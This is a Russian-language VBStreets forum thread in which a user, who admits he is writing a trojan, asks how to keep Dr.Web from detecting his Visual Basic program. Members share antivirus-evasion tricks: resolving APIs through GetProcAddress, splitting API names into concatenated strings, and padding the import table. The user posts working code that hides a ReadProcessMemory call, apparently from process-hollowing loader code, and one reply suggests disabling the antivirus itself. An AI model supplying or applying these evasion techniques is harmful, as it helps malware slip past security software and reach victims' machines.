Конференция VBStreets

[xenomorph]

Привет всем!

Аутлайн:

1. Пишу прогу на ВБ. (оригинальное начало, да?)
2. Вроде всё хокей.
3. Добавляю в прогу 1 модуль.
4. Компилирую.
5. DrWeb орёт - "подозрение на вирус!!!" ->"мочить \ не мочить"

Трабла: сия ситуация меня мягко говоря "не устраивает".
Модуль критичен - без него никак.

Фишка:

1. Менял код - модифицировал - DrWeb орёт "Подозрение на Трой.Вин32!"
2. Выносил в класс - "Подозрение на Трой.Вин32!"
3. Менял название переменных \ процедур - "Подозрение на Трой.Вин32!"
4. Раскидывал по модулям - "Подозрение на Трой.Вин32!"

5. (!) Начял удалять код - (система 50\50 - 50% кода оставлям -
если орёт дальше, продолжаем, если нет - рассматриваем другие 50%,
далее в цикле ...)

Вообщем - довавляю в код декларации 2х АПИ
ReadProcessMemory &
WriteProcessMemory - ОРЁТ.
Убираю - молчит.

Вопрос вобщем -
как сделать так чтоб он заткнулся?
1. Не пакерами.
2. Желательно модификацией кода.
3. Модуль - критичен - выкидывать низЯЯЯ!

Хинты:
Я думаю, что алерт АВ связан с секцией импорта АПИ.
Как они располагаються в .exe?
Похоже что ругаеться он именно на таблицу импорта АПИ.
Как разместить их декларации чтоб они изменили сигнатуры?
Есть ли вожможность вызова АПИ по имени?

т.п. как в АЗМ-е -
LoadDll
GetProcByName
push arg1
push arg2
push arg3
Call ProcName?

Все РАЗУМНІЕ ИДЕИ по СУЩЕСТВУ приветствуться!
Заранее огромное спасибо!
--
ЧТО именно я пишу - єто сугубо МОЁ дело,
коментв и дураЦкие вопросы - >> \dev\null

[keks-n]

xenomorph
C этими попвтками скрыться (что здесь, что в теме unstoppeble exe) легко можно зайти в тупик.
Надо изобретать этот, как там в Alpha Centauri говорилось... А вот: Алгоритм охоты на охотников, то есть в данном случае прибивать DrWeb

[GM]

5. DrWeb орёт - "подозрение на вирус!!!" ->"мочить \ не мочить"

У меня такой же случай был, все прогу перерыл все равно Dr.Web пишет Backdoor. Как понял именно из-за таблицы импорта.
Все решилося вызовом ф-ции ShellExecute через GetProcAddress ...

[xenomorph]

2: GM
А можно пример єтой радости?
т.е. GetProcAddress даёт адресс процедуры -
а как это вызвать???
--
Скажу огромное спасибо за код !

[GM]

Помню GSerg выкладывал пример в проектах. А я выложу то что юзал в своей проге.

[xenomorph]

EPM - Entry Point Modification (?) ...
Евристика Доктора Вэба не спалит? ...
Объясни на пальцах как это делать пожалуйста!
(если можно - то подетпаьнее ...)
--
ИМХО это не сильно гуд - т.к. если у АВ антиэвристика будет на высоте - т.е. факт изменения Т.В. он засечёт ИМХО ничё харошего из этого не выйдет - но пожжалуйста - я буду ооочнь признателен за технологию! - КАК это сделать .

[Maitris]

xenomorph, не знаю как сейчас, но в 3-5 мес. назад версии от heuristики WeбA помогал вынос вызовов "подозрительных" Api в отдельные Sub'ы. Отлично шло для Данилова, как и для Каспера :)

[xenomorph]

2 Flex:
Sorry - у меня такая привычка .
Буду исправляться!

Да и напиши как-нить прогу -
ентри-пойнт модификатор.
Полезняшка выйдет!
--

Хух ... нервов потрепало ,
Я ещё троян не дописал -
а он уже детектится.
Во облом да? ...
И чё, - Дк.Вэб это оказываеться не на
ветер выброшеные деньги?
LOL!

Вопстчем - как я это решил ...

1. Обнаружил АПИ, к. доктор не переваривает:
ReadProcessMemory.
Что итнтересно - к WriteProcessMemory - он абсолютно равнодушен,
а вот ReadProcessMemory - его просто повергает в тихий ужас .

Как её не объявляй -
Private Declare
Public Declare
... и в модулях и в классах и в контролах -
всё равно детектит (!).

2. Я попытался "разбавить" таблицу импорта введя 10 процедур
с подомным именем (5 - до по алфавиту, и 5 - после):
так:

Public Declare Function ReadPrinter Lib "winspool.drv" Alias "ReadPrinter" (ByVal hPrinter As Long, pBuf As Any, ByVal cdBuf As Long, pNoBytesRead As Long) As Long
Public Declare Function ReadFileEx Lib "kernel32" Alias "ReadFileEx" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpOverlapped As OVERLAPPED, ByVal lpCompletionRoutine As Long) As Long
Public Declare Function ReadFile Lib "kernel32" Alias "ReadFile" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As OVERLAPPED) As Long
Public Declare Function ReadEventLog Lib "advapi32.dll" Alias "ReadEventLogA" (ByVal hEventLog As Long, ByVal dwReadFlags As Long, ByVal dwRecordOffset As Long, lpBuffer As EVENTLOGRECORD, ByVal nNumberOfBytesToRead As Long, pnBytesRead As Long, pnMinNumberOfBytesNeeded As Long) As Long

Public Declare Function ReadProcessMemory Lib "kernel32" Alias "ReadProcessMemory" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Public Declare Function RealizePalette Lib "gdi32" Alias "RealizePalette" (ByVal hdc As Long) As Long
Public Declare Function Rectangle Lib "gdi32" Alias "Rectangle" (ByVal hdc As Long, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Public Declare Function RectInRegion Lib "gdi32" Alias "RectInRegion" (ByVal hRgn As Long, lpRect As RECT) As Long
Public Declare Function RectVisible Lib "gdi32" Alias "RectVisible" (ByVal hdc As Long, lpRect As RECT) As Long
Public Declare Function RedrawWindow Lib "user32" Alias "RedrawWindow" (ByVal hwnd As Long, lprcUpdate As RECT, ByVal hrgnUpdate As Long, ByVal fuRedraw As Long) As Long

Ну само собой я менял их местами и выносил в разные модули -
0 по фазе - детектит (!)

3. Попробывал её вызвать через динамический вызов -
без обявления явно - ТОТ ЖЕ РЕЗУЛЬТАТ!

Я оффигел - во Доктор даёт да?

Я честно не верил что он анализирует файл на наличие строки:
(я с трудом представляю КАК ТАК можно ловить вирусы 8-ХХХ)

Вот что в результате:

'-----------------------------< покусано >------------------------------
'Direct API Call: (Is Detected by Dr.Web)
'Call ReadProcessMemory(pi.hProcess, ByVal context.Ebx + 8, addr, 4, 0)
'-----------------------------< покусано >------------------------------
;NOT Detected Mod:

Dim p1 As Long
Dim p2 As Long
'Dim K As String
Dim RPM As String

p1 = pi.hProcess
p2 = context.Ebx + 8

'Detected Calls:
'RPM = Trim(" ReadProcessMemory")

'Undetected Calls:
'RPM = "Read" & "Process" & Trim(" Memory")
RPM = Trim(" R" & "eadProcessMemory")

Call CallApiByName("kernel32.dll", _
RPM, _
p1, _
p2, _
VarPtr(addr), _
4, _
0)
'-----------------------------< покусано >------------------------------
Делайте выводы ...
Если честно - то экристика на высоте ...
.
--
Всем пасибо!

[GM]

Хех, вспомнил у меня та же трабла была, я в файле просто написал
"Shell" + "Execute", и все заработало.

[xenomorph]

2 GM А раньше - сказаить не мог Ж-)))

[Adam Smith]

Легко они тогда отделались.

Сейчас всё сложнее.

8 из 46 или 6 из 46, но авира гнида популярная, битдэфэндэр тоже говорят рулит.

И че делать ума не приложу.

[Хакер]

Adam Smith, постинг в темы, обсуждение которых давно закончилось — это некрофилия, наказуемое деяние.
В данном случае, постинг в тему, обсуждение которой закончилось 7 назад, это злостная некрофилия.

В следующий раз будешь наказан.